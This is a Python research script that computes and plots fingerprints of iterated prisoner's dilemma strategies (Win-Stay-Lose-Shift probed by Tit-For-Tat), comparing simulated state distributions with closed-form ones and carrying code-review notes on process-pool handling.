    evaluate = partial(expected_value, fingerprint_strat(), probe_strat,
                       turns, repetitions, warmup, start_seed)
    original_half = original_pool.map(evaluate, original_coords)
    original_pool.close()
    original_pool.join()

    dual_pool = Pool(cores)
    evaluate_dual = partial(expected_value, dual(fingerprint_strat()), probe_strat,
                            turns, repetitions, warmup, start_seed)
    dual_half = dual_pool.map(evaluate_dual, dual_coords)
    dual_pool.close()
    dual_pool.join()

    combined = original_half + dual_half
    combined.sort()
    return combined
def AnalyticalWinStayLoseShift(coords):
    """Closed-form fingerprint value for Win-Stay-Lose-Shift (Pavlov)
    probed by Tit-For-Tat at the grid point ``coords``.

    Returns:
        (coords, analytical score)
    """
    x, y = coords
    top = 3 * x * (x - 1) + y * (x - 1) + 5 * y * (y - 1)
    bottom = 2 * y * (x - 1) + x * (x - 1) + y * (y - 1)
    return coords, top / bottom
def fingerprint(fingerprint_strat, probe_strat, granularity, cores,
                turns=50, name=None, repetitions=50, warmup=0, start_seed=0):
    """Compute and save a heatmap fingerprint of ``fingerprint_strat``
    probed by ``probe_strat`` over the coordinate grid.
    """
    out_file = fingerprint_strat.name + ".pdf" if name is None else name
    scores = get_results(fingerprint_strat, probe_strat, granularity, cores,
                         turns, repetitions, warmup, start_seed)
    # One row per distinct x, one column per distinct y.
    xs = set(point[0][0] for point in scores)
    ys = set(point[0][1] for point in scores)
    grid = np.array([point[1] for point in scores]).reshape(len(xs), len(ys))
    sns.heatmap(grid, xticklabels=False, yticklabels=False)
    plt.savefig(out_file)
def analytical_distribution_wsls(coords):
    """Closed-form normalised state distribution for Win-Stay-Lose-Shift
    probed by Tit-For-Tat at the grid point ``coords``.

    Returns:
        (coords, dict mapping each (action, action) state to its probability)
    """
    x, y = coords
    raw = {('C', 'C'): x * (1 - x),
           ('D', 'C'): y * (1 - y),
           ('D', 'D'): y * (1 - x),
           ('C', 'D'): y * (1 - x)}
    # Normalise so the four probabilities sum to one.
    norm = 1.0 / (2 * y * (1 - x) + x * (1 - x) + y * (1 - y))
    return coords, {state: p * norm for state, p in raw.items()}
def state_distribution_comparison(fingerprint_strat, probe_strat, granularity, cores,
                                 turns=50, repetitions=50, warmup=0, start_seed=0):
    """Write a LaTeX table comparing, per grid point and per state, the
    simulated state distribution against the analytical WSLS distribution.

    The table is written to "comparison.txt" in the working directory.
    """
    results = get_results(fingerprint_strat, probe_strat, granularity, cores, turns, repetitions,
                          warmup, start_seed)
    dual_coords, original_coords = get_coordinates(granularity)
    coordinates = dual_coords + original_coords
    # NOTE(review): this Pool is never close()d/join()ed, unlike get_results.
    q = Pool(cores)
    analytical_dist = q.map(analytical_distribution_wsls, coordinates)
    analytical_dist.sort()
    final_results = []
    # Pair each analytical distribution with the simulated one at the same
    # (sorted) coordinate, rounding both to two decimals.
    for i, an in enumerate(analytical_dist):
        coordinates = results[i][0]
        sim_dist = results[i][2]
        ana_dist = an[1]
        new_dict = defaultdict(tuple)
        for state, value in sim_dist.items():
            new_dict[state] = (float("%.2f" % value), float("%.2f" % ana_dist[state]))
        final_results.append((coordinates, dict(new_dict)))
    # Distinct x values form both the header row and the row labels.
    xs = sorted(list(set([i[0][0] for i in final_results])))
    table = "& "
    table += " & ".join(str(e) for e in xs) + " \\\ \n"
    for coord1 in xs:
        table += "\hline \n"
        table += "{0:.1f}".format(coord1)
        for st in states:
            for coord2 in xs:
                table += " & "
                table += "({0})".format(", ".join(str(i) for i in st))
                table += ": "
                # Look up the (simulated, analytical) pair at (coord1, coord2).
                sim_val = [dict(element[2])[st] for element in results if element[0] == (coord1, coord2)]
                ana_val = [element[1][st] for element in analytical_dist if element[0] == (coord1, coord2)]
                table += "({0:.2f}, {1:.2f})".format(sim_val[0], ana_val[0])
        table += " \\\ \n"
    # NOTE(review): ``info`` records the run parameters but is never written
    # to the output file -- presumably it was meant to be prepended to
    # ``table``; confirm the intent before changing behaviour.
    info = """%% fingerprint strat - {}
    %% probe strat - {}
    %% granularity - {}
    %% cores - {}
    %% turns - {}
    %% repetitions - {}
    %% warmup - {}
    %% start seed - {}""".format(fingerprint_strat, probe_strat, granularity, cores,
                                 turns, repetitions, warmup, start_seed)
    with open("comparison.txt", 'w') as outfile:
        outfile.write(table)
def analytical_fingerprint(granularity, cores, name=None):
    """Plot the analytical Win-Stay-Lose-Shift fingerprint as a heatmap.

    Evaluates the closed-form WSLS/TFT score at every grid point in
    parallel and saves the resulting heatmap.

    Args:
        granularity: grid spacing in [0, 1) for the probe coordinates.
        cores: number of worker processes.
        name: output file name passed to ``plt.savefig`` (required in
            practice -- the ``None`` default would fail inside savefig).
    """
    dual_coords, original_coords = get_coordinates(granularity)
    coordinates = dual_coords + original_coords
    p = Pool(cores)
    scores = p.map(AnalyticalWinStayLoseShift, coordinates)
    # Fix: release the worker processes (the pool was previously leaked),
    # matching the close/join pattern used in get_results().
    p.close()
    p.join()
    scores.sort()
    xs = set([i[0][0] for i in scores])
    ys = set([i[0][1] for i in scores])
    values = np.array([i[1] for i in scores])
    clean_data = np.array(values).reshape(len(xs), len(ys))
    sns.heatmap(clean_data, xticklabels=False, yticklabels=False)
    plt.savefig(name)
def plot_sum_squares(fingerprint_strat, probe_strat, granularity, cores,
                     turns=50, name=None, repetitions=50, start_seed=0):
    """Plot, per state, the mean squared error between simulated and
    analytical WSLS state distributions as a function of match length.

    For each match length ``t`` in ``1..turns-1`` the simulated
    distributions (from ``get_results``) are compared point-wise with the
    closed-form ones (``analytical_distribution_wsls``) over the whole
    coordinate grid; the mean of the non-zero squared errors per state is
    plotted and the figure saved to ``name`` (default "sum_squares.pdf").
    """
    plot_name = "sum_squares.pdf" if name is None else name
    dual_coords, original_coords = get_coordinates(granularity)
    coordinates = dual_coords + original_coords
    warmup = 0  # no warm-up turns are discarded in this comparison
    cc_errors = []
    cd_errors = []
    dc_errors = []
    dd_errors = []
    # The analytical distribution does not depend on the match length, so
    # it is computed once, up front.
    q = Pool(cores)
    analytical_dist = q.map(analytical_distribution_wsls, coordinates)
    # Fix: release the worker processes (the pool was previously leaked).
    q.close()
    q.join()
    analytical_dist.sort()
    for t in range(1, turns):
        results = get_results(fingerprint_strat, probe_strat, granularity, cores, t, repetitions,
                              warmup, start_seed)
        cc_e = []
        cd_e = []
        dc_e = []
        dd_e = []
        for index, value in enumerate(results):
            sim_dist = value[2]
            ana_dist = analytical_dist[index][1]
            # Squared error per state; insertion order is CC, CD, DC, DD as
            # accumulated over ``states`` in expected_value().
            errors = [(val - ana_dist[key])**2 for key, val in sim_dist.items()]
            cc_e.append(errors[0])
            cd_e.append(errors[1])
            dc_e.append(errors[2])
            dd_e.append(errors[3])
        # NOTE(review): np.mean of an empty list (when every error is
        # exactly zero) yields nan with a RuntimeWarning -- those points
        # simply do not appear on the plot.
        cc_errors.append(np.mean([x for x in cc_e if x > 0]))
        cd_errors.append(np.mean([x for x in cd_e if x > 0]))
        dc_errors.append(np.mean([x for x in dc_e if x > 0]))
        dd_errors.append(np.mean([x for x in dd_e if x > 0]))
    plt.plot(cc_errors, label='CC errors')
    plt.plot(cd_errors, label='CD errors')
    plt.plot(dc_errors, label='DC errors')
    plt.plot(dd_errors, label='DD errors')
    plt.ylim(0, 0.01)
    plt.xlabel('Turns')
    plt.ylabel('Mean Errors Squared')
    plt.legend()
    plt.savefig(plot_name)
# Example invocations (kept commented) and the driving call below.
# NOTE(review): the call runs at import time and uses multiprocessing.Pool
# without an ``if __name__ == "__main__"`` guard, which breaks on platforms
# that use the "spawn" start method (e.g. Windows).
# fingerprint(axl.WinStayLoseShift, axl.TitForTat,
#             granularity=0.01, cores=4, turns=50, repetitions=5, warmup=0)
# analytical_fingerprint(0.01, 4, "AnalyticalWinStayLoseShift.pdf")
# state_distribution_comparison(axl.WinStayLoseShift, axl.TitForTat, granularity=0.2, cores=4,
#                               turns=200, repetitions=20, warmup=100)
plot_sum_squares(axl.WinStayLoseShift, axl.TitForTat, granularity=0.05, cores=4,
                 turns=100, repetitions=5, name="large_errors_plot.pdf")
| [
"james.campbell@tanti.org.uk"
] | james.campbell@tanti.org.uk |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.